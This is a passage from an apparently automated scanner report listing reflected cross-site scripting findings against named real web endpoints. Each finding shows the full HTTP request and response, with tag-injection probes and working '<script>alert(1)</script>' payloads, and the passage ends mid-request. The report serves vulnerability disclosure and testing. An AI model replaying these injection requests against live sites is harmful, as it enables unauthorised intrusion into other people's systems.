Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:15 GMT
Content-Length: 22396
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799d659f<a>818d4ea9fd6/ClipInfoService.asmx" />
...[SNIP]...

1.97. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e5957<a>b4dfccdf814 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&e5957<a>b4dfccdf814=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:23 GMT
Content-Length: 5637
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&e5957<a>b4dfccdf814=1/ErrorInfoService.asmx" />
...[SNIP]...

1.98. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 7211b<a>d13bd9d5899 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337997211b<a>d13bd9d5899 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:21 GMT
Content-Length: 5625
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2337997211b<a>d13bd9d5899/ErrorInfoService.asmx" />
...[SNIP]...

1.99. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c107a<a>e030cdb19c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&c107a<a>e030cdb19c8=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:54:36 GMT
Connection: close
Content-Length: 27398

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&c107a<a>e030cdb19c8=1/PlaylistInfoService.asmx" />
...[SNIP]...

1.100. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 805d1<a>9442a9480e1 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799805d1<a>9442a9480e1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:54:34 GMT
Connection: close
Content-Length: 27386

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799805d1<a>9442a9480e1/PlaylistInfoService.asmx" />
...[SNIP]...

1.101. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6158d<a>fef6ea25a2d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&6158d<a>fef6ea25a2d=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:23 GMT
Content-Length: 8814
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&6158d<a>fef6ea25a2d=1/RSSService.asmx" />
...[SNIP]...

1.102. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload ddf95<a>fbeebb8e4ab was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799ddf95<a>fbeebb8e4ab HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:20 GMT
Content-Length: 8802
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799ddf95<a>fbeebb8e4ab/RSSService.asmx" />
...[SNIP]...

1.103. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 41784<a>c99c3d4327e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&41784<a>c99c3d4327e=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:17 GMT
Content-Length: 5534
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799&41784<a>c99c3d4327e=1/RatingService.asmx" />
...[SNIP]...

1.104. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 95d07<a>a64db502d4d was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-233799/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379995d07<a>a64db502d4d HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Tue, 08 Feb 2011 04:45:16 GMT
Content-Length: 5522
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-23379995d07<a>a64db502d4d/RatingService.asmx" />
...[SNIP]...

1.105. http://r.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a6594"><script>alert(1)</script>787c1397da1 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=a6594"><script>alert(1)</script>787c1397da1&sp=y&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=FM4QLcaMabkQsarcOBMTT_qd1v3GGeBcoJK0MOl0KG-Y481wEkFtGX7HudJA1SwJY9n9GIWJHDTqbWbTuEexfNzeQdD3uMEbsSJGoH6nZcvCzn_rbeUw4N91a2HFDwx7Wl6PMIbl8VoYkne2SJkXTcTcqhcYEXFRrx1COjt-xQdPBFgEFn33aBMbAqV_0XEIioGKZSAftgkVYZTzRayYVmmTJdkIn7237siDdt9MzJqJi5T6FYiHf9o35IlREqTNFveKpsZQ30qpNKi15RJt04BNhaXhDlSq6EvznmypgJEkna5GLuKLpEu7eZEeTMi7F6sK_rp2soXzwueUGRFartfze4TUjaNUIXjW8HpTdIXW8uxzXCZHw_1hR9tJint6dsPDEFhRxd_Mub3GEI1LN-tHiIt90vCIZrFIVkRcrTHWSuqW6r5ZIwUtscKD_QT9RhXOUlzX0--TPsid5EqGlKaR8fzj-CgEMyGy4iMXI1WxKbXh9CKgY6S3LP_zmj75AgqPmyW7n-K57XLwzviwi0UeS0QSNHqXIchkIsQCETGT3yD6yFHAIahzcKETB33UwCPq2GhFCxYySztyqVkKk9fqbN4-YU4FEz0wwkD5vsFOGK_87tDq8e92tNo34emrEgGEUj-NO1cCBiKRN0KNH1ftcOyrV1OLoU5x9aMp-92fSDdx8Pm4E6I95eyuD_EIQOJmu9RYL7YOIJ6DsZdIlrLgwokXGxtO8_jRpe316oYDuH7CMSEB_S7o6Xm3tvDBfH77IJVG0N6dycTdcjtOKF0Cz2TbSViJ-oT4nVLBUOQ7zE-OOnjPRQ6BZXJCY0oCMrkBfNspHfysXvb7GqOmGNAITbT7Z6AmMx12CVhoBV8PCKPJoslzeIPsOadDQ5GApTHEeUcb_20FLCe61hOZos4ND7pDMbh_Nz4asivfvnRRu_fmnuOn7vvqoBU15Zmhn2aVSJry2cIXXaBci8YswRWnz3-1lFmH8NpHbFKrPy3hBObtf8ALhKpons6mVN9Ng_E4yJzpnqztVh_CB-KMHlM4At-mEES-WC-9xjj3t3cnzJw50Wq6BglWv58k-98YkSbTm3kPOUdWBiWoLi0oN0AgeHAdeFjGHSfjDkMzE5p5e_oJDB2Um-liToPNlmN15FjrbRSBV8G9GwEgDofeTOxem0_gMApf3YWMEr3kQAQnXe4HjQMTBDROpzYRLGofXKwaWNtdj1-GtHzOUqyENh2k1W2pFwJOjkpENaGP0tqhG0BtDC_eTH_Ts10GvA6WhyC22lBHkEPeNKFx7RiTWcHRNLuEX2-svGHkdhG53xdJo9qHwXLy45nY7LSpUbn803gUXikBp5CFzTHxBLV0jIUUb9PGuTCtW-hvx86uIjCl7RrDpkAZSszkN92RjKcOSHyDTphfUd0ZqQTAbIYvZtNr_wQwmIEY35OpKNWhyGwNPlAh_ANj4laYRoTBJxnGQ7wgWZt0CSpxlrfASU5W2a6su59vlF-h6V4zet13tlPhRMEiyYm825vPff2nJDmVgFpIKs_vIo7sFsppJ43d8oTEgInxyFT6vScD8wD9aZjmMC0w6HS0HlWcNr1j-PhGS2ikng608Ubz0iz0TtbwhgQZq5IdyfSisA1KqAwL3sZErWVr76O0bqQTEPkhkBBP4vNeu_uKiDKKl73FedJ05pAh6qV14YUcXNrVmSSI1FzEzQ65n9aZSqRKUiLFvw0_FzJQi642bOf20jjwau1yNWbWc_OZc_OPEEY_dnkrDVdmeoMCTOxN_xl7C-3y_RTPHX8tA53fNzl8qfH897V8IhWPCe1DLrZ9lRQtTCZwINCJg6hyABA61hUJaqPVyX7fV7Pa1PW0-yYXb_USKuin2pZCaBr_uY_2UBH6Bm4UktJmd6sVQvXXEqhe9E5LsneRLFWbUdQszzXxD5egB584f5Iq0VaWXCofBTTX6PHG8K6lFCCN0TTnR1jCog1stnuLrLH_TLw0g_9l8j595C25K_O7nXuUqzkznnHJS2oIivO1MtzkhTD8tggahFLAwdtimGiAzgIbfwh3tPXiXBZiPEc6jmaSPplk32IRb7Tl08IFN1OghxmtWT_y47n5TtZS9Ky93uZuiaOzgh6RPqobZokxjCycBjwJJ-OqeZ3YCRoZ5XICuXWVHfipzGbbMT7XgVwScM8a1QBrHN9hJ559oPfWNXLGQYJF8WI3xWHXIXB86oJHZOjQy7IdFPhSTsF2yrOAh9s72IpPTbIy0ryOZR5kHQoGKZaDQPufKDCKOsAs5UyVIQTo0ztnk49jL0nNFaq4usSu0TQiqXjP7CIAd_5FtzMDApKZjTZ9VwWqS_hi3W5FLLAcz8HdwETYSzM0iqfAGlpVHegt_TIDru8ZVGlo2JchDi2BE0kETeswJqfjIM8eqB1CZXkSQ7Z_VjVnYvzBVNyB9AksqD2lQZb2X0IEqN843HNpf9LL79Gl1KBsoCUhcPx0GvFd6LDM_NesCTjn8qfPanRhqfFt_Mz5uEh2A3HFoGkf8ppxZxL6925r_GgrDoF5KcCR0z_dNX3kzjeRcgqW8BhR69hQhpeZrZnEJ52ohaD3WrTkTUj4YJ6Td6PLaDgaJxtMnnZrfAlG0SSD0cpxrho96Q5aYPi9en1l66z-sdlCvM2HwHHvukFOG1d5EaBIpvNzbIjvRqOmzYDhYzHqcbaWBj06fa97gFmB5jdUYj5pSK3CD2Yuk0PK5FYetxUklFsdind5sgdq4uZcD2KLx9Zf7jaxnwz6suaPAnsGTiQgiUvKmhf1LhrytQYKxDy-h4T29iDJXVr_vHZNnZTSMo3FOqO76V7e32Mz948gl-62XtaGUS8uw5NCpnBNXGUaigKHIg84ueIc4t5Yp3YWsvWh2i358DyJOyzgpnBHfTKfL-U_Busa7oEsjSep6DjzyTifPlN_P4smDk3kLq_iHqbXQ5svnKXdR0fKJFj2seLH8BbDFMsPiVsBIQ44v1dSgCalvY0FxkkJ5w0OZeWQP34jwLIAF168EspxmNyBZAxjbmEt8kjG7dRMykkE2LHXhz6x23r28D5B1-HnnnOalxwc8pVPIG67O2v9MtuGBypG0oO1sVM2Vbs7HFOP9G8F0R3RxUgEDCioFUEKPhCNOF99OExqDKIS0y-D3H8kAPjeIydjzyH2Ws7PKyE1dGY4WEg1BMpUBtxwX2H-7BKKuqPq2iSXQ7keQevoGn3niEhwrkx3I523rYfTIHt_4ntge3wT6HrPHWBJpD6Hr91CxZq9sV9Jmp33y8raIDjGaQc_8c0sEToR_ODvxgcgJ32KFhukOoA2cRquiPMf-CiwpIi4ayv6yWP-tXJ__VAnBFQL8j9ZaHEtyQCLoYLPIaWZ3CmWGBp_xNH3WlqbXOyrf_ATBbMNQCTCxOAxrjPhFf5rtBKDWKm24urmdIW_ZXAbYCZmLsz6YiVpaNRjSC9cVWjph0vEeVDn94cCqpnjE0z1BuYxXU6aN8KvfgQRgY4ZaCnGHk-ja9faWwfL-_-bPH3YFMHRKzulr4fOZJphXH_Th5iLN0VczjS8Jh9TEFyiFtC1iUdTIWwbUQ3HeHZgtn1yA0PmWEs3TAjOPMDh8jx0WcV7eT-TG33S7CRXLm9kG5yXyNmxCrzJ; fc=8Kodsw1QIRNJBnpSjhgJ0uErbJkTJYsNaCBFpaSI5yP-4Y1aL5T0hqj7dZyIiRNIWMZgDtcnKM_xOWbKnaMIO3_WyzVPxgN3VkTg_cPuFqziwJJKZupkpjfaBrjFc6z7RfOX1MD02-o6SZ1b0c_HcUiZ1Q4B83ZCB0ZNq2R2Ygc; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=15012%7C15011%7C15011%7C15013%7Cundefined%7C15011%7C15011%7C15011%7C15011%7C15011%7C15013%7C15013%7C14983%7C15013%7C15003; rv=1; pf=gVcpu03qRQgTB5NuU1EqIYqEr4b4Fq-og3GojR5p24eyrpLutjrg3FTJXr1E8PV6vkLTiGPWsGKJ1Wrqhl-HhQ7j1HFoP4OsobTnoYCCxvnKntOZfYFXgkvEXaL1UobLYMC1xk5bi3WvwsH-xYl33kP849CF7hcjVhWHTHUUYTis0H9ih5-5vFSOsVYuhQt6Iv4QeHxZTxJkHtgeP2GkzQt7XxlMyKRnDT2fVADwdo44PGNU_vJbXyHKcL6jneNP4-z_78WwfuPYpNg79jqGRprSVFacyOS-5Ebs506rt3Aem2wjSmTSakSnCA2AgYS6r3vWJ5sNwMJc7eO_e5WNawlDHzxcnnyKiFnoDhsGNc4pAxb4A7I47CNUJ6AbwwHHAatLSIvwiSzIGMiHluajY8fLBNpf3ENHcSGhLyQY8Gw-qep7oDaftEDZ2hKV8ANOevweg3MZu04fOjiPLG71HIPlyME1Zf31UWf3v_Xcs7g; uid=3011330574290390485

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Sun, 07-Aug-2011 02:09:00 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:08:59 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&rnd=7475527706804467806&fpid=a6594"><script>alert(1)</script>787c1397da1&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.106. http://r.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2604a"><script>alert(1)</script>f2f82733516 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=2604a"><script>alert(1)</script>f2f82733516&admeld_call_type=iframe&admeld_user_id=6acccca4-d0e4-464e-a824-f67cb28d5556&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/below-fold?t=1297130902623&tz=360&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.nypost.com%2F&refer=
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
